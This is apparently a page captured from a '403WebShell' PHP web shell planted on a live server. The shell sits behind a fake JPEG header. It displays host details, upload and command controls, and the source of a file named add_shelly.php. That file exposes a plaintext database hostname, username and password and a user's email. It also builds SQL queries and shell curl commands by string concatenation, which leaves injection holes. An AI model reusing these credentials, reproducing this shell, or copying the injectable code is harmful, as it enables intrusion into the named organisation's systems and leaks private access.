????JFIF??x?x????'403WebShell
403Webshell
Server IP : 79.136.114.73  /  Your IP : 216.73.216.36
Web Server : Apache/2.4.7 (Ubuntu) PHP/5.5.9-1ubuntu4.29 OpenSSL/1.0.1f
System : Linux b8009 3.13.0-170-generic #220-Ubuntu SMP Thu May 9 12:40:49 UTC 2019 x86_64
User : www-data ( 33)
PHP Version : 5.5.9-1ubuntu4.29
Disable Function : pcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_wifexited,pcntl_wifstopped,pcntl_wifsignaled,pcntl_wexitstatus,pcntl_wtermsig,pcntl_wstopsig,pcntl_signal,pcntl_signal_dispatch,pcntl_get_last_error,pcntl_strerror,pcntl_sigprocmask,pcntl_sigwaitinfo,pcntl_sigtimedwait,pcntl_exec,pcntl_getpriority,pcntl_setpriority,
MySQL : ON  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : ON  |  Pkexec : ON
Directory :  /var/www/appsrv.astacus.se/shellyctr/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :

[ Back ]     

Current File : /var/www/appsrv.astacus.se/shellyctr//add_shelly.php
<?php

$mysqli = new mysqli("www.astacus.se", "carlhoffstedt", "Astacus2020!", "ShellyCTR");


	$Username = "carl.hoffstedt@astacus.se";

 	$sql = "SELECT * FROM tblShellyConnections WHERE Username = '".$Username."' ";

    $result = $mysqli->query($sql);

    while($obj = $result->fetch_object()){  
        $CloudKey =  $obj->CloudKey;  
        $Server =  $obj->Server;   
		$id =  $obj->id;   
    }

	exec('curl -X POST '.$Server.'/device/all_status/ -d "?show_info=false&auth_key='.$CloudKey.'"', $output, $retval);

	$devices = json_decode($output[0],true);
	$keys = array_keys($devices['data']['devices_status']);

		
		foreach($keys as &$device_id) {
			
			
			exec('curl -X POST '.$Server.'/device/status/ -d "channel=0&id='.$device_id.'&auth_key='.$CloudKey.'"', $output, $retval);
			
			$json = json_decode($output[0],true);
			
			
			$code = $json['data']['devices_status'][$device_id]['code'];
			
			if($code != ""){
			
				$sql = "SELECT * FROM tblShellyConnections, tblShellyUnits WHERE tblShellyConnections.id = tblShellyUnits.ShellyConnectionId and Username = '".$Username."' and DeviceId = '$device_id'";
				
				$result = $mysqli->query($sql);
				$found = 0;
				while($obj = $result->fetch_object()){  
					$found = 1;
					$sql = "UPDATE tblShellyUnits SET Code = '".$code."' WHERE DeviceId = '$device_id'";
					$mysqli->query($sql);
				}
				
				if($found == 0){
					$sql = "INSERT INTO tblShellyUnits VALUES(null, $id, '".$device_id."','".$code."','','',0,0,0);";
					$mysqli->query($sql);
				}
				
				echo($sql."<br>");
			}
			
			
			
		}





?>

Youez - 2016 - github.com/yon3zu
LinuXploit